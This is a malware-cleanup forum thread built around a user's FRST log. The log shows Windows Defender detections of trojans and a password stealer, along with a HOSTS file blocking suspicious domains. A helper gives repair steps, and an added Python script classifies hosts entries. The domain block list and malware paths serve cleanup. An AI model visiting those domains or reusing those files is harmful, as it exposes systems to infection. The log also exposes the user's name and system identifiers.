2019-02-15 00:15 - 2019-02-13 06:14 - 005186032 _____ () C:\Program Files (x86)\Google\Chrome\Application\72.0.3626.109\libglesv2.dll
2019-02-15 00:15 - 2019-02-13 06:14 - 000117232 _____ () C:\Program Files (x86)\Google\Chrome\Application\72.0.3626.109\libegl.dll
2015-05-26 16:46 - 2015-05-26 16:46 - 000094208 _____ () C:\Program Files (x86)\Common Files\Research In Motion\Tunnel Manager\libxpmux.dll
2018-04-12 18:06 - 2019-02-08 19:51 - 001837672 _____ () C:\Program Files (x86)\Microsoft\Skype for Desktop\ffmpeg.dll
2019-02-14 02:43 - 2019-02-08 19:51 - 002400096 _____ () \\?\C:\Program Files (x86)\Microsoft\Skype for Desktop\resources\app.asar.unpacked\node_modules\slimcore\bin\skypert.dll
2019-02-14 02:42 - 2019-02-08 19:51 - 000097840 _____ () \\?\C:\Program Files (x86)\Microsoft\Skype for Desktop\resources\app.asar.unpacked\node_modules\keytar\build\Release\keytar.node
2019-02-14 02:42 - 2019-02-08 19:51 - 000219696 _____ () \\?\C:\Program Files (x86)\Microsoft\Skype for Desktop\resources\app.asar.unpacked\node_modules\electron-ssid\build\Release\electron-ssid.node
2019-02-14 02:42 - 2019-02-08 19:51 - 000081768 _____ () \\?\C:\Program Files (x86)\Microsoft\Skype for Desktop\resources\app.asar.unpacked\node_modules\desktop-idle\build\Release\desktopIdle.node
2019-01-15 01:28 - 2019-01-15 01:28 - 001042744 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
2019-01-15 01:28 - 2019-01-15 01:28 - 000189752 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxslt.dll
2018-05-16 02:59 - 2018-05-16 02:59 - 000076088 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
2018-04-12 18:06 - 2019-02-08 19:51 - 002901504 _____ () C:\Program Files (x86)\Microsoft\Skype for Desktop\libglesv2.dll
2018-04-12 18:06 - 2019-02-08 19:51 - 000015360 _____ () C:\Program Files (x86)\Microsoft\Skype for Desktop\libegl.dll
2019-02-14 02:42 - 2019-02-08 19:51 - 000405056 _____ () \\?\C:\Program Files (x86)\Microsoft\Skype for Desktop\resources\app.asar.unpacked\node_modules\@paulcbetts\spellchecker\build\Release\spellchecker.node
2019-02-14 02:42 - 2019-02-08 19:51 - 000138816 _____ () \\?\C:\Program Files (x86)\Microsoft\Skype for Desktop\resources\app.asar.unpacked\node_modules\keyboard-layout\build\Release\keyboard-layout-manager.node
2019-02-14 02:42 - 2019-02-08 19:52 - 003257192 _____ () \\?\C:\Program Files (x86)\Microsoft\Skype for Desktop\resources\app.asar.unpacked\node_modules\slimcore\bin\Processing.NDI.Lib.x86.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)


==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\38318503.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\38318503.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"

==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)

IE trusted site: HKU\.DEFAULT\...\localhost -> localhost
IE trusted site: HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\localhost -> localhost

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2013-08-22 14:25 - 2019-02-05 00:52 - 002097392 _____ C:\Windows\system32\drivers\etc\hosts

127.0.0.1 space1.adminpressure.space
127.0.0.1 trackpressure.website
127.0.0.1 htagzdownload.pw
127.0.0.1 texttotalk.org
127.0.0.1 360devtraking.website
127.0.0.1 room1.360dev.info
127.0.0.1 djapp.info
127.0.0.1 technologievimy.com

==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Stanley\AppData\Local\Microsoft\Windows\Themes\RoamedThemeFiles\DesktopBackground\img4.jpg
DNS Servers: 192.168.8.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: Off)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

If an entry is included in the fixlist, it will be removed.

MSCONFIG\Services: TeamViewer => 2
MSCONFIG\Services: TenorshareWinAdService => 2
MSCONFIG\Services: WsAppService => 2
MSCONFIG\startupreg: utweb => "C:\Users\Stanley\AppData\Roaming\uTorrent Web\utweb.exe" /MINIMIZED
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\StartupApproved\Run: => "utweb"
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\StartupApproved\Run: => "IncrediMail"
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\StartupApproved\Run: => "RIMDeviceManager"
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\StartupApproved\Run: => "QTWQA7PTCRBGCEE"

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [TCP Query User{27AB2084-96CC-423D-8AE7-D0AC93666081}C:\users\stanley\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\stanley\appdata\roaming\utorrent\utorrent.exe (BitTorrent Inc -> BitTorrent Inc.)
FirewallRules: [UDP Query User{3AF93F33-8A51-4215-BC5E-F4DB7A8EEE52}C:\users\stanley\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\stanley\appdata\roaming\utorrent\utorrent.exe (BitTorrent Inc -> BitTorrent Inc.)
FirewallRules: [{50B50355-5350-4725-BD33-5A7C6482C01A}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{E18A37C3-3221-4F6B-9241-67BE79FCF0DC}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{07B5D44D-4E10-43B2-9078-1C393459622F}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\IncMail.exe No File
FirewallRules: [{667D3D91-E5EA-4EA3-9A3C-5C2F77E71A0D}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\IncMail.exe No File
FirewallRules: [{0CF852DE-F4B5-441D-95F8-130531A3076F}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\ImApp.exe No File
FirewallRules: [{0513F420-E8DE-4C74-BAF0-F3CFF66CE5C6}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\ImApp.exe No File
FirewallRules: [{6DDFF7C5-16FF-49FF-95F9-472442614287}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google Inc.)
FirewallRules: [{255BD4B5-55AB-4A04-AF01-2ECA95F1F335}] => (Allow) C:\Program Files\Opera\58.0.3135.65\opera.exe (Opera Software AS -> Opera Software)
FirewallRules: [TCP Query User{DD2AF73D-267B-418A-A0F5-05DD5ED97831}C:\users\stanley\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\stanley\appdata\roaming\utorrent\utorrent.exe (BitTorrent Inc -> BitTorrent Inc.)
FirewallRules: [UDP Query User{A7B50CA7-7E26-4E38-BC39-4332936FB3E2}C:\users\stanley\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\stanley\appdata\roaming\utorrent\utorrent.exe (BitTorrent Inc -> BitTorrent Inc.)

==================== Restore Points =========================

30-01-2019 08:42:13 Scheduled Checkpoint
07-02-2019 07:32:46 Scheduled Checkpoint
14-02-2019 03:01:16 Removed IncrediMail.
14-02-2019 23:59:09 Restore Point Created by FRST
16-02-2019 07:50:46 JRT Pre-Junkware Removal

==================== Faulty Device Manager Devices =============

Name: 
Description: 
Class Guid: 
Manufacturer: 
Service: 
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.


==================== Event log errors: =========================

Application errors:
==================
Error: (02/18/2019 01:22:23 AM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: License Activation (slui.exe) failed with the following error code:
hr=0x8007007B
Command-line arguments:
RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=81671aaf-79d1-4eb1-b004-8cbbe173afea;NotificationInterval=1440;Trigger=NetworkAvailable

Error: (02/17/2019 01:43:05 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 7875

Error: (02/17/2019 01:43:05 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 7875

Error: (02/17/2019 01:43:05 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second

Error: (02/17/2019 01:43:05 PM) (Source: RIM MDNS) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 7875

Error: (02/17/2019 01:43:05 PM) (Source: RIM MDNS) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 7875

Error: (02/17/2019 01:43:05 PM) (Source: RIM MDNS) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second

Error: (02/17/2019 01:43:01 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 3953


System errors:
=============
Error: (02/17/2019 01:14:02 PM) (Source: Tcpip) (EventID: 4199) (User: )
Description: The system detected an address conflict for IP address 0.0.0.0 with the system
having network hardware address 00-00-00-00-00-00. Network operations on this system may
be disrupted as a result.

Error: (02/16/2019 09:01:30 AM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: The Iskysoft Application Framework Service service hung on starting.

Error: (02/16/2019 09:00:39 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: The OpenVPN Legacy Service service terminated with the following error: 
The process cannot access the file because it is being used by another process.

Error: (02/16/2019 09:00:37 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The UC Browser Service service failed to start due to the following error: 
The system cannot find the file specified.

Error: (02/16/2019 08:33:34 AM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: The Iskysoft Application Framework Service service hung on starting.

Error: (02/16/2019 08:32:43 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: The OpenVPN Legacy Service service terminated with the following error: 
The process cannot access the file because it is being used by another process.

Error: (02/16/2019 08:32:42 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The UC Browser Service service failed to start due to the following error: 
The system cannot find the file specified.

Error: (02/16/2019 07:38:07 AM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: The Iskysoft Application Framework Service service hung on starting.


Windows Defender:
===================================
Date: 2019-02-15 01:30:44.644
Description: 
Windows Defender scan has been stopped before completion.
Scan ID: {33A0CEFD-234D-475F-8ADE-5D3D11D9E85A}
Scan Type: Antimalware
Scan Parameters: Full Scan

Date: 2019-02-14 03:37:29.427
Description: 
Windows Defender scan has been stopped before completion.
Scan ID: {37ABE826-5D4C-4627-8D24-955304B7A07C}
Scan Type: Antimalware
Scan Parameters: Quick Scan

Date: 2019-02-13 23:30:12.489
Description: 
Windows Defender has detected malware or other potentially unwanted software.
For more information please see the following:
http://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Fuerboos.C!cl&threatid=2147723654&enterprise=0
Name: Trojan:Win32/Fuerboos.C!cl
ID: 2147723654
Severity: Severe
Category: Trojan
Path: file:_C:\Users\Stanley\AppData\Local\Dingbam.tst
Detection Origin: Local machine
Detection Type: FastPath
Detection Source: User
Process Name: Unknown
Signature Version: AV: 1.285.1510.0, AS: 1.285.1510.0, NIS: 0.0.0.0
Engine Version: AM: 1.1.15600.4, NIS: 0.0.0.0

Date: 2019-02-13 23:30:12.489
Description: 
Windows Defender has detected malware or other potentially unwanted software.
For more information please see the following:
http://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Bitrep.A&threatid=2147723097&enterprise=0
Name: Trojan:Win32/Bitrep.A
ID: 2147723097
Severity: Severe
Category: Trojan
Path: file:_C:\Users\Stanley\AppData\Local\IM\Identities\{A156883C-4811-474F-ACCE-796599B8B822}\Message Store\Messages\4\{E94F6B5A-2129-4595-A27B-FBAABD7D5EE2}\Attachments\Order_009.pdf
Detection Origin: Local machine
Detection Type: FastPath
Detection Source: User
Process Name: Unknown
Signature Version: AV: 1.285.1510.0, AS: 1.285.1510.0, NIS: 0.0.0.0
Engine Version: AM: 1.1.15600.4, NIS: 0.0.0.0

Date: 2019-02-13 23:30:12.489
Description: 
Windows Defender has detected malware or other potentially unwanted software.
For more information please see the following:
http://go.microsoft.com/fwlink/?linkid=37020&name=SoftwareBundler:Win32/Prepscram&threatid=226289&enterprise=0
Name: SoftwareBundler:Win32/Prepscram
ID: 226289
Severity: High
Category: Software Bundler
Path: containerfile:_C:\Users\Stanley\Downloads\Programs\BG-HUNTING SERBIA.txt;file:_C:\Users\Stanley\Downloads\Programs\BG-HUNTING SERBIA.txt->setup.exe
Detection Origin: Local machine
Detection Type: Concrete
Detection Source: User
Process Name: Unknown
Signature Version: AV: 1.285.1510.0, AS: 1.285.1510.0, NIS: 0.0.0.0
Engine Version: AM: 1.1.15600.4, NIS: 0.0.0.0

Date: 2019-02-13 16:10:19.791
Description: 
Windows Defender has encountered an error trying to update signatures.
New Signature Version: 
Previous Signature Version: 1.269.584.0
Update Source: Microsoft Update Server
Signature Type: AntiVirus
Update Type: Full
Current Engine Version: 
Previous Engine Version: 1.1.14901.4
Error code: 0x80070424
Error description: The specified service does not exist as an installed service. 

Date: 2019-02-13 16:02:00.333
Description: 
Windows Defender has encountered an error trying to update signatures.
New Signature Version: 
Previous Signature Version: 1.269.584.0
Update Source: Microsoft Malware Protection Center
Signature Type: AntiSpyware
Update Type: Full
Current Engine Version: 
Previous Engine Version: 1.1.14901.4
Error code: 0x80072ee2
Error description: The operation timed out 

Date: 2019-02-13 16:02:00.333
Description: 
Windows Defender has encountered an error trying to update signatures.
New Signature Version: 
Previous Signature Version: 1.269.584.0
Update Source: Microsoft Malware Protection Center
Signature Type: AntiVirus
Update Type: Full
Current Engine Version: 
Previous Engine Version: 1.1.14901.4
Error code: 0x80072ee2
Error description: The operation timed out 

Date: 2019-02-13 15:59:52.285
Description: 
Windows Defender has encountered an error trying to update signatures.
New Signature Version: 
Previous Signature Version: 1.269.584.0
Update Source: Microsoft Update Server
Signature Type: AntiVirus
Update Type: Full
Current Engine Version: 
Previous Engine Version: 1.1.14901.4
Error code: 0x80070424
Error description: The specified service does not exist as an installed service. 

Date: 2018-05-29 09:02:21.940
Description: 
Windows Defender has encountered a critical error when taking action on malware or other potentially unwanted software.
For more information please see the following:
http://go.microsoft.com/fwlink/?linkid=37020&name=PWS:Win32/Dyzap.X&threatid=2147717189&enterprise=0
Name: PWS:Win32/Dyzap.X
ID: 2147717189
Severity: Severe
Category: Password Stealer
Path: process:_pid:5952,ProcessStart:131720254146746317
Detection Origin: Unknown
Detection Type: Concrete
Detection Source: System
Process Name: C:\Users\Stanley\AppData\Local\Temp\~AceTemp\APPROVED_DOCUMENTS_2018_PDF\APPROVED DOCUMENTS 2018_PDF.exe
Action: Quarantine
Action Status:  To finish removing malware and other potentially unwanted software, you need to run a full scan. For information about scanning options, see Help and Support. 
To finish removing malware and other potentially unwanted software, restart the computer. 
Error Code: 0x8007054f
Error description: An internal error occurred. 
Signature Version: AV: 1.267.1085.0, AS: 1.267.1085.0, NIS: 0.0.0.0
Engine Version: AM: 1.1.14800.3, NIS: 0.0.0.0

CodeIntegrity:
===================================

Date: 2018-12-23 07:19:51.102
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\wsadb.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2018-12-23 07:19:49.365
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\wsadb.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2018-12-23 07:19:47.582
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\wsadb.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2018-12-23 07:19:45.686
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\wsadb.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

==================== Memory info =========================== 

Processor: Intel(R) Core(TM) i5-2540M CPU @ 2.60GHz
Percentage of memory in use: 71%
Total physical RAM: 4006.35 MB
Available physical RAM: 1129.15 MB
Total Virtual: 7974.35 MB
Available Virtual: 4140.02 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:297.75 GB) (Free:65.53 GB) NTFS

\\?\Volume{4756afb4-4eee-11e8-824f-806e6f6e6963}\ (System Reserved) (Fixed) (Total:0.34 GB) (Free:0.09 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 298.1 GB) (Disk ID: 2DDE751F)
Partition 1: (Active) - (Size=350 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=297.7 GB) - (Type=07 NTFS)

==================== End of Addition.txt ============================


AND PLEASE SIR, I'M WORRIED ABOUT THIS FROM THE ADDITION.TXT

 

 

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2013-08-22 14:25 - 2019-02-05 00:52 - 002097392 _____ C:\Windows\system32\drivers\etc\hosts

127.0.0.1 space1.adminpressure.space
127.0.0.1 trackpressure.website
127.0.0.1 htagzdownload.pw
127.0.0.1 texttotalk.org
127.0.0.1 360devtraking.website
127.0.0.1 room1.360dev.info
127.0.0.1 djapp.info
127.0.0.1 technologievimy.com

 

WHAT DOES IT MEAN?????



Hi,

Please follow these instructions carefully. If possible, print them; it will help you follow the directives.

Please download the attached Fixlist.txt file to the same folder where the Farbar tool is running from.
The location is listed in the 3rd line of the FRST.txt log you have submitted.

===

When done continue.

I was informed by an expert that you will need to run this fix in the Recovery Environment to completely remove the infection.

Boot in the Recovery Environment WINDOWS 8, 8.1 USERS

To enter the Recovery Environment with Windows 8 or Windows 8.1, follow the instructions in this tutorial on EightForums
https://www.eightforums.com/tutorials/4935-startup-options-menu-boot-windows-8-a.html

Once in the Windows RE, go to the Command Prompt. See the image.

At the prompt, type
cd C:\Users\Stanley\Downloads\FRST and press the Enter key.

You should see the FRST .exe and the Fixlist.txt files.

Type frst.exe (or, for the x64 version, frst64.exe) and press Enter.

FRST will open
Click on Yes to accept the disclaimer <- if required.
Click on the Scan button and wait for the scan to complete
A log called FRST.txt will be saved in the FRST folder.
Attach it in your next reply

If at any time you need help, please ask.

p.s.
To exit the Recovery Environment (RE) type Exit and press the enter key.

===

Quote

AND PLEASE SIR, I'M WORRIED ABOUT THIS FROM THE ADDITION.TXT

Your HOSTS file (no extension) is protecting you from going to the bad sites listed.

Read about it.
http://winhelp2002.mvps.org/hosts.htm
===

Please let me know what problems you are having with this computer.

fixlist.txt

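The point made in the reply above about the HOSTS entries, as an added example that is not part of the original thread and is not FRST's own logic: a name mapped to a loopback or null address cannot resolve to a real server, while a name mapped to any other address is a redirect worth reviewing. The sample file is constructed (three hostnames come from the Addition.txt excerpt, the rest are made up), and the verdict labels and the `LOCAL_NAMES` set are assumptions of this sketch.

```python
import ipaddress
from collections import Counter, namedtuple

Entry = namedtuple("Entry", "line_no address hostname verdict")

# Names that normally point at loopback on a clean system (assumption).
LOCAL_NAMES = {"localhost", "localhost.localdomain"}

# Constructed sample. Lines 2-4 reuse hostnames from the Addition.txt excerpt;
# the remaining lines are invented to exercise the other branches.
SAMPLE_HOSTS = """\
# constructed sample hosts file
127.0.0.1 space1.adminpressure.space
127.0.0.1 trackpressure.website
127.0.0.1   djapp.info   # trailing comment
0.0.0.0 ads.example.test tracker.example.test
::1 localhost
203.0.113.10 login.example.test
not-an-ip broken.example.test
"""


def verdict_for(address, hostname):
    """Classify one address/hostname pair from a hosts file."""
    try:
        # Drop an IPv6 zone id (fe80::1%eth0) before parsing.
        ip = ipaddress.ip_address(address.split("%", 1)[0])
    except ValueError:
        return "invalid"
    if ip.is_loopback and hostname in LOCAL_NAMES:
        return "local"        # the standard localhost mapping
    if ip.is_loopback or ip.is_unspecified:
        return "blocked"      # name is sinkholed to this machine / nowhere
    return "redirected"       # name is forced to some other address


def parse_hosts(text):
    """Return one Entry per hostname; a line may carry several names."""
    entries = []
    # Windows editors may leave a UTF-8 BOM at the start of the file.
    for line_no, raw in enumerate(text.lstrip("\ufeff").splitlines(), start=1):
        line = raw.split("#", 1)[0].strip()   # strip comments
        if not line:
            continue
        address, *names = line.split()
        if not names:                         # address with no hostname
            entries.append(Entry(line_no, address, "", "invalid"))
            continue
        for name in names:
            hostname = name.lower().rstrip(".")
            entries.append(
                Entry(line_no, address, hostname, verdict_for(address, hostname))
            )
    return entries


def summarize(entries):
    """Count verdicts and list the entries a reviewer should look at."""
    counts = Counter(e.verdict for e in entries)
    review = [e for e in entries if e.verdict in ("redirected", "invalid")]
    return counts, review


if __name__ == "__main__":
    counts, review = summarize(parse_hosts(SAMPLE_HOSTS))
    print(dict(counts))
    for e in review:
        print(f"line {e.line_no}: {e.address} {e.hostname} [{e.verdict}]")
```

Run against a copy of the real file, the `review` list is the part to read by hand; a file the size shown in the log (about 2 MB) will mostly be `blocked` entries.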

  • Root Admin

Glad we could help.

If you need this topic reopened, please send a Private Message to any one of the moderating team members. Please include a link to this topic with your request.

This applies only to the originator of this thread. Other members who need assistance please start your own topic in a new thread.

Thanks

 

This topic is now closed to further replies.